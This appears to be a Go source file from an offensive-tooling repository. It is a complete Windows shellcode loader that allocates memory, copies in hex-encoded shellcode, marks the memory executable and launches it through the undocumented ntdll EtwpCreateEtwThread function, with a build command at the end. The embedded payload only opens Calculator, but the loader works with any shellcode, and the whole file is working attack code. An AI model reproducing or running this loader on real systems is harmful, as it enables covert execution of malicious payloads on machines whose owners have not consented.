navsec
6879f4e317
* Adding shellcode running techniques using Go * Removing auto-generated guid before PR --------- Co-authored-by: navsec <navsec@navsec.net>
136 lines
4.9 KiB
Go
136 lines
4.9 KiB
Go
//go:build windows
|
|
// +build windows
|
|
|
|
// CREDIT: https://raw.githubusercontent.com/Ne0nd0g/go-shellcode/master/cmd/EtwpCreateEtwThread/main.go
|
|
|
|
/*
|
|
This program executes shellcode in the current process using the following steps
|
|
1. Allocate memory for the shellcode with VirtualAlloc setting the page permissions to Read/Write
|
|
2. Use the RtlCopyMemory macro to copy the shellcode to the allocated memory space
|
|
3. Change the memory page permissions to Execute/Read with VirtualProtect
|
|
4. Call EtwpCreateEtwThread on shellcode address
|
|
5. Call WaitForSingleObject so the program does not end before the shellcode is executed
|
|
|
|
This program loads the DLLs and gets a handle to the used procedures itself instead of using the windows package directly.
|
|
*/
|
|
|
|
// Demonstrates using ntdll.dll!EtwpCreateThreadEtw for local shellcode execution: https://gist.github.com/TheWover/b2b2e427d3a81659942f4e8b9a978dc3
|
|
|
|
package main
|
|
|
|
import (
|
|
"encoding/hex"
|
|
"flag"
|
|
"fmt"
|
|
"log"
|
|
"unsafe"
|
|
|
|
// Sub Repositories
|
|
"golang.org/x/sys/windows"
|
|
)
|
|
|
|
const (
|
|
// MEM_COMMIT is a Windows constant used with Windows API calls
|
|
MEM_COMMIT = 0x1000
|
|
// MEM_RESERVE is a Windows constant used with Windows API calls
|
|
MEM_RESERVE = 0x2000
|
|
// PAGE_EXECUTE_READ is a Windows constant used with Windows API calls
|
|
PAGE_EXECUTE_READ = 0x20
|
|
// PAGE_READWRITE is a Windows constant used with Windows API calls
|
|
PAGE_READWRITE = 0x04
|
|
)
|
|
|
|
func main() {
|
|
verbose := flag.Bool("verbose", false, "Enable verbose output")
|
|
debug := flag.Bool("debug", false, "Enable debug output")
|
|
flag.Parse()
|
|
|
|
// Pop Calc Shellcode
|
|
shellcode, errShellcode := hex.DecodeString("505152535657556A605A6863616C6354594883EC2865488B32488B7618488B761048AD488B30488B7E3003573C8B5C17288B741F204801FE8B541F240FB72C178D5202AD813C0757696E4575EF8B741F1C4801FE8B34AE4801F799FFD74883C4305D5F5E5B5A5958C3")
|
|
if errShellcode != nil {
|
|
log.Fatal(fmt.Sprintf("[!]there was an error decoding the string to a hex byte array: %s", errShellcode.Error()))
|
|
}
|
|
|
|
if *debug {
|
|
fmt.Println("[DEBUG]Loading kernel32.dll and ntdll.dll")
|
|
}
|
|
kernel32 := windows.NewLazySystemDLL("kernel32.dll")
|
|
ntdll := windows.NewLazySystemDLL("ntdll.dll")
|
|
|
|
if *debug {
|
|
fmt.Println("[DEBUG]Loading VirtualAlloc, VirtualProtect and RtlCopyMemory procedures")
|
|
}
|
|
VirtualAlloc := kernel32.NewProc("VirtualAlloc")
|
|
VirtualProtect := kernel32.NewProc("VirtualProtect")
|
|
RtlCopyMemory := ntdll.NewProc("RtlCopyMemory")
|
|
EtwpCreateEtwThread := ntdll.NewProc("EtwpCreateEtwThread")
|
|
WaitForSingleObject := kernel32.NewProc("WaitForSingleObject")
|
|
|
|
if *debug {
|
|
fmt.Println("[DEBUG]Calling VirtualAlloc for shellcode")
|
|
}
|
|
addr, _, errVirtualAlloc := VirtualAlloc.Call(0, uintptr(len(shellcode)), MEM_COMMIT|MEM_RESERVE, PAGE_READWRITE)
|
|
|
|
if errVirtualAlloc != nil && errVirtualAlloc.Error() != "The operation completed successfully." {
|
|
log.Fatal(fmt.Sprintf("[!]Error calling VirtualAlloc:\r\n%s", errVirtualAlloc.Error()))
|
|
}
|
|
|
|
if addr == 0 {
|
|
log.Fatal("[!]VirtualAlloc failed and returned 0")
|
|
}
|
|
|
|
if *verbose {
|
|
fmt.Println(fmt.Sprintf("[-]Allocated %d bytes", len(shellcode)))
|
|
}
|
|
|
|
if *debug {
|
|
fmt.Println("[DEBUG]Copying shellcode to memory with RtlCopyMemory")
|
|
}
|
|
_, _, errRtlCopyMemory := RtlCopyMemory.Call(addr, (uintptr)(unsafe.Pointer(&shellcode[0])), uintptr(len(shellcode)))
|
|
|
|
if errRtlCopyMemory != nil && errRtlCopyMemory.Error() != "The operation completed successfully." {
|
|
log.Fatal(fmt.Sprintf("[!]Error calling RtlCopyMemory:\r\n%s", errRtlCopyMemory.Error()))
|
|
}
|
|
if *verbose {
|
|
fmt.Println("[-]Shellcode copied to memory")
|
|
}
|
|
|
|
if *debug {
|
|
fmt.Println("[DEBUG]Calling VirtualProtect to change memory region to PAGE_EXECUTE_READ")
|
|
}
|
|
|
|
oldProtect := PAGE_READWRITE
|
|
_, _, errVirtualProtect := VirtualProtect.Call(addr, uintptr(len(shellcode)), PAGE_EXECUTE_READ, uintptr(unsafe.Pointer(&oldProtect)))
|
|
if errVirtualProtect != nil && errVirtualProtect.Error() != "The operation completed successfully." {
|
|
log.Fatal(fmt.Sprintf("Error calling VirtualProtect:\r\n%s", errVirtualProtect.Error()))
|
|
}
|
|
if *verbose {
|
|
fmt.Println("[-]Shellcode memory region changed to PAGE_EXECUTE_READ")
|
|
}
|
|
|
|
if *debug {
|
|
fmt.Println("[DEBUG]Calling EtwpCreateEtwThread...")
|
|
}
|
|
//var lpThreadId uint32
|
|
thread, _, errEtwThread := EtwpCreateEtwThread.Call(addr, uintptr(0))
|
|
|
|
if errEtwThread != nil && errEtwThread.Error() != "The operation completed successfully." {
|
|
log.Fatal(fmt.Sprintf("[!]Error calling EtwpCreateEtwThread:\r\n%s", errEtwThread.Error()))
|
|
}
|
|
|
|
if *verbose {
|
|
fmt.Println("[+]Shellcode Executed")
|
|
}
|
|
|
|
if *debug {
|
|
fmt.Println("[DEBUG]Calling WaitForSingleObject...")
|
|
}
|
|
|
|
_, _, errWaitForSingleObject := WaitForSingleObject.Call(thread, 0xFFFFFFFF)
|
|
if errWaitForSingleObject != nil && errWaitForSingleObject.Error() != "The operation completed successfully." {
|
|
log.Fatal(fmt.Sprintf("[!]Error calling WaitForSingleObject:\r\n:%s", errWaitForSingleObject.Error()))
|
|
}
|
|
}
|
|
|
|
// export GOOS=windows GOARCH=amd64;go build -o EtwpCreateEtwThread.exe ./EtwpCreateEtwThread.go
|